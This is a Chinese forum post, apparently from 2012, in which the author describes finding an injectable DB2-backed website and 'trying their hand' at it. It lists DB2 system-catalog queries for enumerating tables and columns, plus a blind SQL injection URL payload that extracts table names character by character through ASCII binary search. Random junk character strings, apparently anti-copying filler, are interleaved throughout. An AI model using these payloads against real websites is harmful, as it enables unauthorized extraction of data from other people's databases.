使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 5 q3 Z/ p; \- @$ {
参考了IBM DB2的文档,总结了这样几条:
; g5 ?, L: h) J* J, y! F8 Q( r0 B) h% e1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
0 L2 y# s9 r$ z可以返回系统中所有用户创建的表(table)名 ) ~% X) u( e, B7 I* Y7 I8 |
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' 4 S$ X3 v" c5 z* T1 d* w5 Q
返回表中的列名
: B: U. _1 i( j0 _. A; G3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY ) l1 a5 ]" g" c0 G' H- G" Z
这是最关键的地方,返回第一条记录,类似于sql server中的top 1 / k& {- t( q7 }( h3 {5 O
4、SUBSTR(string, position, length)
( Q9 Z1 `, S$ Q5 f$ X' M$ _返回字符串子串的函数,类似于mid
$ }. B7 _/ z8 B& m: I5、ASCII()这个就不用多说了。
+ ]# x3 M+ @; W有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。 $ L) v6 a7 P. N# N! J6 P4 ^9 U4 m
例如判断第一个table的名称的第一个字符的ascii码是否大于50: , W* P2 B! y7 ^0 E1 c; v7 @
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
; l! w3 y, u# I9 X5 D& X# _/ s0 J8 l' x' l
http://blog.waynedeng.com/blogview.asp?logID=543
. [6 _4 \8 |, O" a5 \ |
发表于 2012-9-15 14:06:51
收藏
支持
反对